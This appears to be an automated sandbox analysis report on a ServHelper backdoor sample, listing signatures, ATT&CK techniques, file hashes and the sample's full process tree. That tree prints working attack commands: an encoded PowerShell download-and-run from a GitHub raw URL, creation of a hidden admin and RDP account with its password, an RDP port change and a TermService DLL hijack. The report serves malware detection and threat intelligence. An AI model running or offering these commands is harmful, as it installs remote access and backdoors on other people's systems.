servhelper | da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605

Analysis

max time kernel
140s
max time network
118s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 14:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe
Size

5.7MB
MD5

61d5e32562d1c70daf0a3112f7888258
SHA1

11c54ce99e87637f58c7bc0bd8134c73df9bf879
SHA256

da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
SHA512

9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
SSDEEP

49152:wDK8merb/T/vO90dL3BmAFd4A64nsfJdo5GQ5shfTuU92flI7MhhaftEhamnybrN:wD+3eGLmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2436 powershell.exe
6 2436 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2316 icacls.exe
1976 takeown.exe
2080 icacls.exe
2268 icacls.exe
1668 icacls.exe
2020 icacls.exe
1664 icacls.exe
2332 icacls.exe

flow	pid	process
5	2436	powershell.exe
6	2436	powershell.exe

pid	process
2316	icacls.exe
1976	takeown.exe
2080	icacls.exe
2268	icacls.exe
1668	icacls.exe
2020	icacls.exe
1664	icacls.exe
2332	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

1748
1748
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1664 icacls.exe
2332 icacls.exe
2316 icacls.exe
1976 takeown.exe
2080 icacls.exe
2268 icacls.exe
1668 icacls.exe
2020 icacls.exe

pid	process
1748
1748

pid	process
1664	icacls.exe
2332	icacls.exe
2316	icacls.exe
1976	takeown.exe
2080	icacls.exe
2268	icacls.exe
1668	icacls.exe
2020	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
6 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MKEMTASMMOHCBLG5JULA.temp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2496 WMIC.exe

pid	process
2496	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 900efb55538bda01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1036 reg.exe
Runs net.exe

pid	process
1036	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2608	powershell.exe
356	powershell.exe
3008	powershell.exe
1648	powershell.exe
2608	powershell.exe
2608	powershell.exe
2608	powershell.exe
2436	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid process

484
1748
1748
1748
1748
1748

pid	process
484
1748
1748
1748
1748
1748

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	356	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeRestorePrivilege	2268	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2496	WMIC.exe
Token: SeAuditPrivilege	2496	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2496	WMIC.exe
Token: SeAuditPrivilege	2496	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2632	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2632	WMIC.exe
Token: SeAuditPrivilege	2632	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2632	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2632	WMIC.exe
Token: SeAuditPrivilege	2632	WMIC.exe
Token: SeDebugPrivilege	2436	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2188 wrote to memory of 2608	2188	da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe	powershell.exe
PID 2188 wrote to memory of 2608	2188	da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe	powershell.exe
PID 2188 wrote to memory of 2608	2188	da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe	powershell.exe
PID 2608 wrote to memory of 2692	2608	powershell.exe	csc.exe
PID 2608 wrote to memory of 2692	2608	powershell.exe	csc.exe
PID 2608 wrote to memory of 2692	2608	powershell.exe	csc.exe
PID 2692 wrote to memory of 2412	2692	csc.exe	cvtres.exe
PID 2692 wrote to memory of 2412	2692	csc.exe	cvtres.exe
PID 2692 wrote to memory of 2412	2692	csc.exe	cvtres.exe
PID 2608 wrote to memory of 356	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 356	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 356	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 3008	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 3008	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 3008	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 1648	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 1648	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 1648	2608	powershell.exe	powershell.exe
PID 2608 wrote to memory of 1976	2608	powershell.exe	takeown.exe
PID 2608 wrote to memory of 1976	2608	powershell.exe	takeown.exe
PID 2608 wrote to memory of 1976	2608	powershell.exe	takeown.exe
PID 2608 wrote to memory of 2080	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2080	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2080	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2268	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2268	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2268	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 1668	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 1668	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 1668	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2020	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2020	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2020	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 1664	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 1664	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 1664	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2332	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2332	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2332	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2316	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2316	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 2316	2608	powershell.exe	icacls.exe
PID 2608 wrote to memory of 1628	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 1628	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 1628	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 1036	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 1036	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 1036	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 2836	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 2836	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 2836	2608	powershell.exe	reg.exe
PID 2608 wrote to memory of 588	2608	powershell.exe	net.exe
PID 2608 wrote to memory of 588	2608	powershell.exe	net.exe
PID 2608 wrote to memory of 588	2608	powershell.exe	net.exe
PID 588 wrote to memory of 2880	588	net.exe	net1.exe
PID 588 wrote to memory of 2880	588	net.exe	net1.exe
PID 588 wrote to memory of 2880	588	net.exe	net1.exe
PID 2608 wrote to memory of 1712	2608	powershell.exe	cmd.exe
PID 2608 wrote to memory of 1712	2608	powershell.exe	cmd.exe
PID 2608 wrote to memory of 1712	2608	powershell.exe	cmd.exe
PID 1712 wrote to memory of 912	1712	cmd.exe	cmd.exe
PID 1712 wrote to memory of 912	1712	cmd.exe	cmd.exe
PID 1712 wrote to memory of 912	1712	cmd.exe	cmd.exe
PID 912 wrote to memory of 2284	912	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe
"C:\Users\Admin\AppData\Local\Temp\da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g5czikhi.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES22ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC22EC.tmp"
      4⤵
      PID:2412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1976
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2080
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2268
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1668
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2020
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1664
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2332
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2316
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1628
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1036
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2836
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2880
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:912
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2284
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1988
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:3060
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:2908
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:452
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1116
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2988

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1300
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1212

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc xrufVHZW /add
1⤵
PID:964
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc xrufVHZW /add
  2⤵
  PID:304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc xrufVHZW /add
    3⤵
    PID:1716

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1208
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:868

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD
1⤵
PID:2224
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD
  2⤵
  PID:1864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD
    3⤵
    PID:2180

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1908
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1144

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc xrufVHZW
1⤵
PID:1912
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc xrufVHZW
  2⤵
  PID:1584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc xrufVHZW
    3⤵
    PID:2852

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1560
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2496

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1728
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2632

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1968
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES22ED.tmp

Filesize
1KB

MD5
b32f59df5d47052aa8e0fd1a45792211

SHA1
d98266f4fc05d773a611dbf19734a5fa2d73eee2

SHA256
e208a7c869f54ede63f7fe80b90d2f9bca568ced3c3e141a7ba215a6bdb3739f

SHA512
023f9239dedb2249534301f873f25e8b12689847f661b4757f38166313c6231ec9de8953a32a062741683fde73a4fcf9f5d6553669b45a0a346c689b57996073

Download Submit
C:\Users\Admin\AppData\Local\Temp\g5czikhi.dll

Filesize
3KB

MD5
142686617c739cbd58ae63cd98401da8

SHA1
65f726f1b94c1b42ef091f8637f667396a25509b

SHA256
eaa265f16438270cfe6ec1073bf1a9fdfc446e3c5301e2a3291d126319625ac2

SHA512
7ea301f6d3105fcb1b6a3666dfa25b21a4c5947fcfbe68aaa8ee4746c18050fbc29f7f8b0060db4da04b3932eb6cc928c6b28612729f27a37876e29cb18c22be

Download Submit
C:\Users\Admin\AppData\Local\Temp\g5czikhi.pdb

Filesize
7KB

MD5
a46e70bd3b06e2657aae77e15783e1e4

SHA1
d3063b3c438af333a8046d99719c3ab23afe3a9a

SHA256
c4d4d1820e2ca7036c994c21a76469b51b664a35b42386bbf908ac03f3759780

SHA512
841150502b5f45b23332dbc0266cb43cd7f9e2b9997975661f71a81ae77bf89515ddaf62323db32c5ac4877bd7d4df2f7cbcf00c87c897f47b169590017a3276

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
9fca6b1768eba2c5d42f189123152e32

SHA1
560ec3249af6e8d82e994554475b870d32145352

SHA256
c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f

SHA512
b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
197621e5351d0d31e7bcdccd84894aba

SHA1
44badcf024c21b6fb130b19d696a9d219e332c65

SHA256
df10fed2ca8167b7b9348e61892aa13ef2c826537427dcf88ac36e7107f16842

SHA512
f61abea8e7122693a8ee6bb36444d729061708dd4f31fe16ef727674cbd6c95a683f87b00328d86817fa829eae2a6238250d434e0fa4535ffd3f2642a185e8cd

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC22EC.tmp

Filesize
652B

MD5
830a4984660215b067b885ef543d287d

SHA1
328ecc5580ae2c1f3648cd2d9fd572ff91e05d5f

SHA256
519311baee2592d1f157ace8a5c93c649acc2ff32f9ba27e9b3ba9d7c414796e

SHA512
bf5a24d1f5f1148dd342f299ef066f4d59e5d5635019418db0df1036df9da1095cb8b8e6fc7057286b86f6196b459317ae99e05de54baea4f5c0bb8bd100eb62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\g5czikhi.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\g5czikhi.cmdline

Filesize
309B

MD5
464e44141bc1a3eb01df2083abdd478d

SHA1
56f75619f2a377012cfe1616d70fda4e4e9e3718

SHA256
c925a197017e96685797dc65c2cf29df7bbb3c56b29fe9f4974596d9b60f6767

SHA512
f2d78dfad95166fef18151b9ba963461ba2934022eafdd8e7fe2d684af278af6024adf20dd218ee218d1fb0c41ec46a509081fdc4eed71a6883c072c47afd645

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
0750828e5a80dae0280c43945332e145

SHA1
fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c

SHA256
637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947

SHA512
a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
0941efccfdbde6a619081456be071102

SHA1
4d9079f335bfdb4e88e022ffdd2193c4561f099d

SHA256
99dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281

SHA512
